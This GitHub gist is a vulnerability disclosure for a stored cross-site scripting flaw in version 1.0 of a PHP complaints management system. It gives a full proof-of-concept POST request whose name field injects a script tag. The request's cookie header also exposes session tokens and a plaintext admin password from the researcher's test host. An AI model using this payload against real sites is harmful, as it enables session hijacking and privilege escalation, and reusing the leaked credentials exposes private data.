Skip to content

Instantly share code, notes, and snippets.

@topsky979

topsky979/sourcecodester_Complaints Report Management System_XSS_1.md Secret

Last active July 29, 2024 02:24
Show Gist options
  • Save topsky979/e8b6651dd46922157920c8ed2305efd5 to your computer and use it in GitHub Desktop.
Save topsky979/e8b6651dd46922157920c8ed2305efd5 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sourcecodester_Complaints Report Management System_XSS_1.md

[description]

Complaints Report Management System was discovered to contain a XSS vulnerability via the URI /admin/ajax.php?action=save_settings.

[Vulnerability Type]

Cross Site Scripting (XSS)

[Vendor of Product]

https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html

[Affected Product Code Base]

1.0

[Impact Escalation of Privileges]

true

[POC]
request payload(Pls be aware of the name field):

POST /admin/ajax.php?action=save_settings HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 3024
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylGtcTy5dSGqTRZW6
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/admin/index.php?page=site_settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; SESSIONID=28d91387-18a2-434a-ae96-03bacb61f632.1ddtyn-D2JpW__TOYHawkV5aWtM; request_token=rgTjWkc5GvhSH7vGBAWa0xRtebrkCk3jDrp3Ii2TdrGU3CbY; layers=5; BatchSelected=null; Path=/www/wwwroot/1111.com/admin; vcodesum=16; PHPSESSID=git91lpt9et0atu8q4dg73890i
Connection: keep-alive

------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="name"

Crime/Complaints Reporting Management System"><script>alert(11)</script>
------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="email"

info@sample.comm
------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="contact"

+6948 8542 623
------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="about"

<p style="text-align: center; background: transparent; position: relative;"><span style="font-size: 30px; font-family: Tahoma, Geneva, sans-serif;"><strong>Sample Content</strong></span></p><p style="text-align: center; background: transparent; position: relative;">&nbsp;Lorem is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><img src="http://localhost/crms/admin/assets/uploads/1604029260_p1.jpg" style="width: 558px;" class="fr-fic fr-dib"></p><p style="text-align: center; background: transparent; position: relative;">&nbsp;Lorem is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p><p style="text-align: center; background: transparent; position: relative;"><br></p><div class="fr-img-space-wrap" style="text-align: center;"><img src="http://localhost/crms/admin/assets/uploads/1604029320_police cars.jpg" style="width: 567px;" class="fr-fic fr-rounded fr-dib"><p class="fr-img-space-wrap2">&nbsp;</p></div><p><br></p><p><br></p><p data-f-id="pbf" style="text-align: center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family: sans-serif;">Powered by <a href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala Editor">Froala Editor</a></p>
------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarylGtcTy5dSGqTRZW6--
图片 图片
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment